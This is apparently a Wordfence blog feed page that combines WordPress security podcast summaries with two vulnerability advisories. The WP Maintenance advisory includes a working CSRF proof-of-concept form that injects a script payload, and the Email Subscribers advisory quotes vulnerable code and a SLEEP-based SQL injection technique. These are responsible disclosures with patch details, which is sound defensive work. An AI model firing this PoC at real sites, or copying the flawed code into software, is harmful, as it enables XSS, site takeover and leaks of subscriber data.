Podcast Episode 60: Top WordPress Influencer Lists & Chrome Password Security Improvements

A small furor erupted over a top influencers in WordPress list that neglected to show the diverse nature of the WordPress community. We talk about the impossibility of making an accurate list that reflects the true nature of WordPress influence or contribution, and the diversity we saw during our work on Open, our film project about the WordPress community. We also talk about Google plans to give slow websites a new badge of shame in Chrome, password security updates in Chrome 79, and the DHS reconsiders a plan to use facial-recognition technology on all U.S. citizens traveling internationally.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

  • A WordPress top influencer list misses out on the diversity and depth of WordPress influence and contribution.
  • Google Chrome plans to warn site visitors of speed and performance problems with websites.
  • Chrome 79 launches with password protection and dozens of security fixes.
  • DHS reconsiders facial recognition technology on US travelers. The US lags behind China in number of surveillance cameras.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Podcast Episode 60: Top WordPress Influencer Lists & Chrome Password Security Improvements appeared first on Wordfence.

Read More

Podcast Episode 59: Mailpoet’s Kim Gjerstad on Beating Spammers and Improving Net Promoter Scores

Kim Gjerstad, one of the founders of Mailpoet, visited with Mark at the Wordfence booth at WordCamp US. Kim and Mark talked about the origins of Mailpoet, the plugin that gives users a full email management system within the WordPress administrative dashboard. They talk about email deliverability as well as the challenges of fighting email abuse, a constant battle that Mailpoet is winning.

They also talk about net promoter scores and what it means for the success of a SaaS business.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Kim Gjerstad on Twitter as @kgjerstad. You can learn more about Mailpoet at mailpoet.com.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Podcast Episode 59: Mailpoet’s Kim Gjerstad on Beating Spammers and Improving Net Promoter Scores appeared first on Wordfence.

Read More

Episode 58: Leadership and the Business of WordPress Plugins: Lessons from the Yoast Black Friday Ad

Yoast, the SEO plugin installed on 9 million WordPress sites, ran a Black Friday sale, experimenting with an ad in the WordPress admin dashboard. The internet furor was dramatic, and Yoast’s CEO Marieke van de Rakt took ownership, showing exceptional leadership. We discuss the ad and the response from both users and competitors and the challenges of running a plugin business under a freemium model. We also cover stories about AVG and Avast browser extensions, the Magento Marketplace hack, the private equity purchase of .org and a data leak affecting 1.2 billion people.

Here are approximate timestamps if you’d like to jump around:
1:10 The Yoast Black Friday Ad Controversy
9:15 Yoast’s leadership in the midst of attacks
15:00 The fremium plugin model, advertising in WordPress admin
25:17 Mozilla Removes Avast and AVG extensions
29:45 Magento Marketplace Hack
32:00 Lessons for WordPress
34:00 Private Equity purchase of .org
43:00 Leak affecting 1.2 billion people

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

  • WP Tavern’s coverage of the Yoast Black Friday ad, and discussion on Hacker News.
  • Mozilla removes Avast/AVG browser extensions.
  • Adobe admits breach of Magento Marketplace portal. Matt Barry’s research into similar risks with the WordPress.org systems.
  • Ethos Capital is taking over .org early next year, and some are calling it the great .org heist, saying that .org was sold for half its valuation.
  • Personal And Social Information Of 1.2 Billion People Discovered In Massive Data Leak.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Episode 58: Leadership and the Business of WordPress Plugins: Lessons from the Yoast Black Friday Ad appeared first on Wordfence.

Read More

Podcast Episode 57: SEO Content Strategy and Lock Picking with Maddy Osman at WordCamp US

Maddy Osman is a SEO content strategist that has worked with a number of familiar brands in both the WordPress and SaaS spaces. She spoke at WordCamp US and took some time to chat with us at the Wordfence sponsor booth. Maddy talks about how she got started in SEO content strategy after doing web design and development, and also what the entrepreneurial journey has been like for her.

Maddy also shows off some of her lock picking skills she picked up while hanging out at the Wordfence booth.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Maddy on Twitter as @MaddyOsman. You can learn more about Maddy’s work at The-Blogsmith.com.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Podcast Episode 57: SEO Content Strategy and Lock Picking with Maddy Osman at WordCamp US appeared first on Wordfence.

Read More

Episode 56: WordCamp US, WordPress 5.3 and Chrome Blocking Mixed Content

In Episode 56, we review the premiere of Open, The Community Code, a film about the WordPress community that world premiered at Matt Mullenweg’s State of the Word Keynote at WordCamp US. Mark and Kathy talk about what it was like watching friends in the community see the film for the first time.

We also discuss recent updates to WordPress in version 5.3, especially some of the improvements to the new Gutenberg editor, accessibility, and site health. We also review Google Chrome’s plans to warn and block mixed content and how site owners can prepare now for these upcoming changes.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

  • Watch Open | The Community Code at open.film.
  • WordPress version 5.3 was launched on November 12 with a number of improvements to the block editor, accessibility and site health.
  • Google will warn site visitors about mixed content in December and start block mixed content in January.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Episode 56: WordCamp US, WordPress 5.3 and Chrome Blocking Mixed Content appeared first on Wordfence.

Read More

High Severity Vulnerability Patched in WP Maintenance Plugin

Description: Cross-Site Request Forgery to Stored Cross-Site Scripting
CVSS v3.0 Score: 8.8 (High)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H
Affected Plugin: WP Maintenance
Plugin Slug: wp-maintenance
Affected Versions: <= 5.0.5
Patched Version: 5.0.6

On November 15th, 2019, our Threat Intelligence team identified a vulnerability present in WP Maintenance, a WordPress plugin with approximately 30,000+ active installs. This flaw allowed attackers to enable a vulnerable site’s maintenance mode and inject malicious code affecting site visitors. We disclosed this issue privately to the plugin’s developer who released a patch the next day.

Plugin versions of WP Maintenance up to 5.0.5 are vulnerable to attacks against this flaw. All WP Maintenance users should update to version 5.0.6 immediately.

Limited Nonce Protection and Input/Output Sanitation

WP Maintenance provides a maintenance mode to site owners wishing to take their site offline during a maintenance period, with useful features for enabling and customizing a maintenance page. These features include a customizable title, customizable text, a custom maintenance page image, custom css styles, a countdown, font and color choices, etc.

With extensive customizability comes a greater responsibility for security. Unfortunately, without nonce protection and scarce input/output sanitization on values, Cross-Site Request Forgery (CSRF) leading to Cross-Site Scripting (XSS) vulnerabilities were possible in WP Maintenance.

Settings could be edited across 6 tabs: General, Colors & Fonts, Pictures, CountDown, CSS Style, and Settings, all of which were susceptible to a CSRF attack. Additionally, several settings could be injected with malicious code, allowing XSS attacks. Settings could also be manipulated to an attacker’s benefit. For instance, an attacker could enable maintenance mode on a site, causing a loss of availability.

The following code illustrates the lack of nonce verification on setting updates:

 /* Update des paramètres */
if( isset($_POST['action']) &amp;&amp; $_POST['action'] == 'update_general' ) {

    if( isset($_POST["wp_maintenance_social_options"]['reset']) &amp;&amp; $_POST["wp_maintenance_social_options"]['reset'] ==1 ) {
        unset($_POST["wp_maintenance_social"]);
        $_POST["wp_maintenance_social"] = '';
    }
    update_option('wp_maintenance_social', $_POST["wp_maintenance_social"]);
    update_option('wp_maintenance_social_options', $_POST["wp_maintenance_social_options"]);
    update_option('wp_maintenance_active', $_POST["wp_maintenance_active"]);
    
    $options_saved = wpm_update_settings($_POST["wp_maintenance_settings"]);

    $messageUpdate = 1;
}

>

A Closer Look at the Exploit

Although all of the settings in this plugin could be changed as a result of this CSRF vulnerability, the “General” settings tab had the most potential impact. This tab is where maintenance mode could be enabled and custom text and title options could be configured.

General settings tab for WP Maintenance.

With no input sanitization, the “Enable Newsletter” feature allowed an attacker to inject malicious code, creating a stored XSS vulnerability that could be exploited by taking advantage of the CSRF vulnerability.

The newsletter title is displayed on the maintenance page without output sanitization, meaning any malicious code set in the newsletter block by an attacker would be executed by a visitor’s browser when in maintenance mode.

Enable newsletter setting from dashboard.

Because an attacker could also enable maintenance mode on a single setting update, these vulnerabilities combined could lead to a site being taken offline and, for example, used to redirect visitors to a malicious site.

Example of what a site would look like if exploited by this vulnerability.

Proof of Concept

&lt;html&gt;
  &lt;body&gt;
   &lt;form action="http://URL/wp-admin/admin.php?page=wp-maintenance" method="POST"&gt;
      &lt;input type="hidden" name="action" value="update_general" /&gt;
      &lt;input type="hidden" name="wp_maintenance_active" value="1" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[titre_maintenance]" value="EVIL ATTACKER!" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[text_maintenance]" value="Come back quickly!" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[text_bt_maintenance]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[add_wplogin]" value="0" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[add_wplogin_title]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[enable_seo]" value="0" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[seo_title]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[seo_description]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[favicon]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[code_analytics]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[domain_analytics]" value="URL" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social_options[enable]" value="0" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social_options[texte]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[facebook]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[twitter]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[linkedin]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[flickr]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[youtube]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[pinterest]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[vimeo]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[instagram]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[google_plus]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[about_me]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[soundcloud]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[skype]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[tumblr]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[blogger]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social[paypal]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social_options[size]" value="32" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social_options[style]" value="style1" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social_options[position]" value="bottom" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social_options[align]" value="center" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social_options[theme]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_social_options[reset]" value="0" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[newletter]" value="1" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[title_newletter]" value="&lt;script&gt;alert("YOU'VE BEEN HACKED!")&lt;/script&gt;" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[type_newletter]" value="shortcode" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[code_newletter]" value="" /&gt;
      &lt;input type="hidden" name="wp_maintenance_settings[iframe_newletter]" value="" /&gt;
      &lt;input type="hidden" name="submit" value="Save Changes" /&gt;
      &lt;input type="submit" value="Submit request" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;

CSRF & Security Awareness

This vulnerability offers a good time to remind ourselves of the importance to stay vigilant to all input from users on our sites, as CSRF exploits are difficult to protect against. A CSRF, or Cross Site Request Forgery vulnerability “is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated.” This means that CSRF vulnerabilities can only be exploited when someone with administrative capability performs an action set up by an attacker. For example, clicking on a link while currently authenticated to a web application like WordPress.

A common example to consider is receiving a comment on your WordPress blog containing a link. Clicking the link in the comment to see what the commenter is referring to could lead to exploitation of a vulnerability. Instead of that link taking you to the site you think you may be visiting, it could send a request to update your WordPress website plugin settings on your behalf.

Stay vigilant when clicking links or attachments in comments or even in emails because it is possible that someone is trying to exploit the human weakness on your site: you. We recommend not visiting any links from an untrusted source because malicious content could be on the other side of that link – even on the other end of a URL shortened link.

If you absolutely must visit and don’t have a virtual machine to protect you from infection, ensure you have antivirus on your machine, then copy the link, make sure you are logged out of all sites, open an incognito window, paste the link in the incognito browser, then visit the site. This can help protect against CSRF vulnerabilities.

As shown in this post, a CSRF has the potential to severely affect your site, it’s availability and your users, and this vulnerability can be easily avoided through security awareness.

Wordfence Protection

Wordfence’s generic XSS firewall rules protect against the stored XSS in vulnerable versions of WP Maintenance. To exploit this XSS vulnerability the CSRF vulnerability must be exploited. As CSRF vulnerabilities cannot be protected against via firewall, we recommend updating to the latest version of WP Maintenance and following our CSRF recommendations to keep your sites safe.

Disclosure Timeline

November 15th, 2019 – Initial private contact with developer and notification of security issue.
November 15th, 2019 – Developer responds.
November 16th, 2019 – Developers acknowledged issue and released patch.

Conclusion

In today’s post, we detailed a CSRF to Stored XSS flaw present in the WP Maintenance plugin. This flaw has been patched in version 5.0.6 and we recommend users update to the latest version available. Sites running Wordfence are protected against XSS exposure by our firewall’s generic rules, however, our firewall rules can not protect against this CSRF vulnerability so it is important to take precautionary measures when clicking links in comments or sent to you via email so you are not exploited by this vulnerability.

The post High Severity Vulnerability Patched in WP Maintenance Plugin appeared first on Wordfence.

Read More

Podcast Episode 55: Yoast’s Marieke van de Rakt & Michiel Heijmans at WordCamp US

At WordCamp US in Saint Louis, Mark sat down with Yoast CEO Marieke van de Rakt and COO Michiel Heijmans in the Wordfence booth to talk about not only how Yoast began, but also how they’ve grown to over 9 million active installations and the challenges of managing such a large user base. Marieke and Michiel also talk about the big changes coming in 2020 for the Yoast plugin as well as training and educational efforts via Yoast Academy.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Marieke on Twitter as @MariekeRakt and Michiel as @Michielheijmans. You can learn more about Yoast and Yoast Academy at Yoast.com.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Podcast Episode 55: Yoast’s Marieke van de Rakt & Michiel Heijmans at WordCamp US appeared first on Wordfence.

Read More

Multiple Vulnerabilities Patched in Email Subscribers & Newsletters Plugin

A few weeks ago, our Threat Intelligence team identified several vulnerabilities present in Email Subscribers & Newsletters, a WordPress plugin with approximately 100,000+ active installs. We disclosed this issue privately to the plugin’s development team who responded quickly, releasing interim patches just a few days after our initial disclosure. The plugin team also worked with us to implement additional security measures.

Plugin versions of Email Subscribers & Newsletters up to 4.2.3 are vulnerable to attacks against all of the vulnerabilities described below, and versions up to 4.3.0 are vulnerable to the SQL injection vulnerability. All Email Subscribers & Newsletters users should update to version 4.3.1 immediately. Wordfence Premium customers received new firewall rules on October 14th to protect against exploits targeting these vulnerabilities. Free Wordfence users receive these rules on November 14th.


Unauthenticated File Download w/ Information Disclosure

Description: Unauthenticated File Download w/ Information Disclosure
CVSS v3.0 Score: 5.8 (Medium)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.2.2
Patched Version: 4.2.3

Email Subscribers & Newsletter provides site owners with the ability to create newsletter campaigns that site users can subscribe to. One feature of this plugin is the ability to export all of the site’s subscribers into a single CSV file containing first names, last names, email addresses, mailing lists the subscriber is on, and more. Unfortunately, there was a flaw in this plugin that allowed unauthenticated users to export subscriber lists and gain all of the information provided by subscribers.

Vulnerability in Detail

In order to provide this functionality, the plugin registered the query variables status and report which were used to signal the export of the subscribers list. In vulnerable versions of this plugin, there was no access control in place to verify that the user exporting the subscriber list had the proper authorization to do so. Therefore, this flaw allowed any unauthenticated user the ability to export the list of subscribers and obtain sensitive information such as user emails by sending the correct query variables and corresponding parameters.

 	public function __construct() {

		$report = ig_es_get_request_data( 'report' );
		$status = ig_es_get_request_data( 'status' );

		if ( $report &amp;amp;&amp;amp; $status ) {

			$status = trim( $status );

			$selected_list_id = 0;

			if ( 'select_list' === $status ) {
				$selected_list_id = ig_es_get_request_data( 'list_id', 0 );

				if ( 0 === $selected_list_id ) {
					$message = __( "Please Select List", "email-subscribers" );
					ES_Common::show_message( $message, 'error' );
					exit();
				}
			}

			$csv = $this-&amp;gt;generate_csv( $status, $selected_list_id );

Blind SQL Injection in INSERT statement

Description: Blind SQL Injection in INSERT statement
CVSS v3.0 Score: 8.3 (High)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.3.0
Patched Version: 4.3.1

Another feature of Email Subscribers & Newsletters was a functionality that tracked ‘open’ actions, amongst a few others, for emails that were sent via configured campaigns. Unfortunately, there was a flaw in this plugin that allowed SQL statements to be passed to the database in the hash parameter creating a blind SQL injection vulnerability. These actions were unauthenticated by default, meaning any user could send these requests, even if no campaigns existed, increasing the significance of this vulnerability.

Vulnerability in Detail

The vulnerable code was present within the \ES_Actions::add function. Rather than using a wpdb::prepare statement, the plugin concatenated the values of the $args parameter into the SQL query and did not escape any additional SQL characters or input. This allowed an attacker to be able to blindly inject SQL statements, like '+SLEEP+' and observe the response from the database, providing useful information to an attacker.

 private function add( $args, $explicit = true ) {

	global $wpdb;

	$args = wp_parse_args( $args, array(
		'created_at' => ig_es_get_current_gmt_timestamp(),
		'updated_at' => ig_es_get_current_gmt_timestamp(),
		'count'      => 1,
	) );

	$sql = "INSERT INTO {$wpdb->prefix}ig_actions (" . implode( ', ', array_keys( $args ) ) . ')';
	$sql .= " VALUES ('" . implode( "','", array_values( $args ) ) . "') ON DUPLICATE KEY UPDATE";

	$sql .= ( $explicit ) ? " created_at = created_at, count = count+1, updated_at = '" . ig_es_get_current_gmt_timestamp() . "'" : ' count = values(count)';

	$result = $wpdb->query( $sql );

	if ( false !== $result ) {
		return true;
	}

	return false;
}

Special thanks to our lead developer, Matt Barry, for discovering this vulnerability. 


Insecure Permissions on Dashboard and Settings

Description: Insecure Permissions on Dashboard and Settings
CVSS v3.0 Score: 6.3 (Medium)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.2.2
Patched Version: 4.2.3

Email Subscribers & Newsletter registers a menu full of settings, audience information, campaign information, forms, and more. This provides administrators with a central area to manage all of this plugin’s features. Unfortunately, there was a flaw in this plugin that allowed any user with the edit_post capability to view and modify settings, along with editing email campaigns and subscriber lists. Typically, only Contributor roles and above have the edit_post capability, however, a number of plugins and themes create custom roles that could allow base level users with the correct permissions to view and edit the settings and features of this plugin, introducing a security risk.

Vulnerability in Detail

This vulnerability was trivial to exploit for any attacker able to login as a user with the edit_post capability. Once the attacker was logged in as a user with the correct capability, the menu options were displayed in the toolbar and the attacker could navigate to the settings and campaigns and make any changes they wanted to. This included sending new campaigns, viewing subscriber information, adding new users, changing settings, and more.

Example of what a user with the edit_post capability can see and modify.


Cross-Site Request Forgery on Settings

Description: Cross-Site Request Forgery on Settings
CVSS v3.0 Score: 5.4 (Medium)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.2.2
Patched Version: 4.2.3

Email Subscribers & Newsletter provides site owners the ability to change and alter settings just like any other plugin. Unfortunately, there were no nonce checks on settings updates that verified if the request came directly from an already existing session with an authenticated administrative user, creating a CSRF vulnerability. This vulnerability allowed attackers to modify settings via CSRF. Some of the settings impacted included: messages to display after subscription, the email “from” address, what mailer to use, standard emails to send after certain actions, and more.

Vulnerability in Detail

The settings form for this plugin generated a nonce with the name es-update-settings, and submitted this nonce with the settings. The issue in this case arose because the code did not perform any verification to check whether the nonce submitted was valid or not. With this vulnerability, a settings update could have been submitted with a blank or invalid nonce, as it did not verify that the nonce submitted came from a valid session. Considering this plugin also had a lack of secure permissions, this vulnerability had a much larger target surface, considering any user with edit_post capabilities could be targeted, whereas typically only administrative level users have the ability to modify plugin settings.

	public function es_settings_callback() {

		$submitted     = ig_es_get_request_data( 'submitted' );
		$submit_action = ig_es_get_request_data( 'submit_action' );

		$nonce = ig_es_get_request_data( '_wpnonce' );

		if ( 'submitted' === $submitted && 'ig-es-save-admin-settings' === $submit_action ) {
			$options = ig_es_get_post_data('', '', false);
			$options = apply_filters( 'ig_es_before_save_settings', $options );
                <!--
                


<div class="content save">
                    <input type="hidden" name="submitted" value="submitted"/>
                    <input type="hidden" name="submit_action" value="ig-es-save-admin-settings"/>
					<?php $nonce = wp_create_nonce( 'es-update-settings' ); ?>

                    <input type="hidden" name="update-settings" id="ig-update-settings" value="<?php echo $nonce; ?>"/>
					<?php submit_button(); ?>
                </div>



                -->

Send Test Emails from the Administrative Dashboard as an Authenticated User [Subscriber+]

Description: Send Test Emails as Subscriber+
CVSS v3.0 Score: 4.3 (Medium)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.2.2
Patched Version: 4.2.3

As previously mentioned, Email Subscribers & Newsletter provides site owners the ability to create “campaigns” that will be sent out via email. Part of the plugin functionality includes an option in the settings dashboard to send test emails in order to verify that a site’s mail function and email integration is working properly. Unfortunately, there was a flaw in this plugin that allowed authenticated users with subscriber and above access the ability to send test emails on behalf of the site owner. Although this is a less severe vulnerability, it still has the potential to be used for harm, as an attacker could send out unwanted emails from a site owner’s email server.

Vulnerability in Detail

In order to send test emails, this plugin registers a wp_ajax function to send_test_email. By default, AJAX actions can be triggered by any authenticated WordPress user sending a request from the wp-admin dashboard. For more sensitive functions, plugin developers should include a permissions or capability check to verify that the AJAX request is coming from a user with the appropriate capabilities to perform that action. With this plugin, we saw that there were no access control checks to verify that the request was coming from an authenticated administrative user, allowing lower level authenticated users to send test emails on behalf of the site owner.

 		add_action( 'wp_ajax_send_test_email', array( $this, 'send_test_email' ) );
 	function send_test_email() {
		$message = array();
		$message = array(
			'status'  => 'ERROR',
			'message' => __( 'Something went wrong', 'email-subscribers' )
		);

Unauthenticated Option Creation

Description: Unauthenticated Option Creation
CVSS v3.0 Score: 6.4 (Medium)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.2.2
Patched Version: 4.2.3

Email Subscribers & Newsletters has an on-boarding process that can be skipped after the plugin is activated. When the on-boarding process is skipped, it creates a new option in the database and saves the value as “yes.” Unfortunately, there was no access control for this feature so any unauthenticated user had the capability to create this option in the database, which could be appended with any value. This option value could later be modified with malicious code in conjunction with the CSRF vulnerability, though we were unable to exploit this by executing any code in this value, making this a much less severe issue.

Vulnerability in Detail

This function used an admin_init action to create the new option. This type of action typically runs when a user accesses the admin area of a site, however, it can also run on admin-ajax.php and admin-post.php. Therefore, if no access controls are in place, unauthenticated users have the ability to initiate the function by sending a request to admin-post.php or admin-ajax.php. This plugin used admin_init with no access controls, therefore, any user had the ability to create a new option with the name ig_es_ob_skip_[option_name], with [option_name] being any value input in the option_name parameter when sending the request. This option would be created with the default value of yes, which could later be changed using the CSRF vulnerability. All an attacker needed to do to exploit this vulnerability was to send a request to admin-ajax.php or admin-post.php with the es_skip parameter set to 1 and the option_name parameter set to the desired value.

 		add_action( 'admin_init', array( $this, 'es_save_onboarding_skip' ) );
	//save skip signup option
	function es_save_onboarding_skip() {

		$es_skip     = ig_es_get_request_data( 'es_skip' );
		$option_name = ig_es_get_request_data( 'option_name' );

		if ( $es_skip == '1' ! empty( $option_name ) ) {
			update_option( 'ig_es_ob_skip_' . $option_name, 'yes' );
			$referer = wp_get_referer();
			wp_safe_redirect( $referer );
			exit();
		}
	}

Disclosure Timeline

October 14th, 2019 – Developers notified privately of security issues.
October 14th, 2019 – Firewall rules released to Wordfence Premium users.
October 17th, 2019 – Developers acknowledged issues and released patches.
October 17th, 2019 – Developers notified that one of the patches was insufficient.
October 23rd, 2019 – Developers released another patch, which was sufficient but needed further security controls. Developers were notified.
November 13th, 2019 – Final Patch is released.
November 14th, 2019 – Free users receive firewall rule to protect against this vulnerability.

Conclusion

In today’s post, we detailed several security flaws present in the Email Subscribers & Newsletter plugin. These flaws have been patched in version 4.3.1 and we recommend that users update to the latest version available immediately. Sites running Wordfence Premium have been protected from attacks against most of these vulnerabilities since October 14th, 2019. Sites running the free version of Wordfence will receive the firewall rule update on November 14th, 2019.

The post Multiple Vulnerabilities Patched in Email Subscribers & Newsletters Plugin appeared first on Wordfence.

Read More

Podcast Episode 54: The Hacker Mindset at WordCamp US

Kathy Zant gave a presentation about The Hacker Mindset at WordCamp US 2019 in St. Louis. Learning to think like a hacker in the security realm is a big part of keeping your assets safe, and there are additional benefits. Kathy illustrates how the hacker mindset is much more than protecting your site. Thinking like a hacker can also help you break through perceived limitations, overcome obstacles, and capitalize on opportunities to innovate.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Podcast Episode 54: The Hacker Mindset at WordCamp US appeared first on Wordfence.

Read More

Podcast Episode 54: The Hacker Mindset at WordCamp US

Kathy Zant gave a presentation about The Hacker Mindset at WordCamp US 2019 in St. Louis. Learning to think like a hacker in the security realm is a big part of keeping your assets safe, and there are additional benefits. Kathy illustrates how the hacker mindset is much more than protecting your site. Thinking like a hacker can also help you break through perceived limitations, overcome obstacles, and capitalize on opportunities to innovate.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Podcast Episode 54: The Hacker Mindset at WordCamp US appeared first on Wordfence.

Read More
Page 1 of 1,02312345»102030...Last »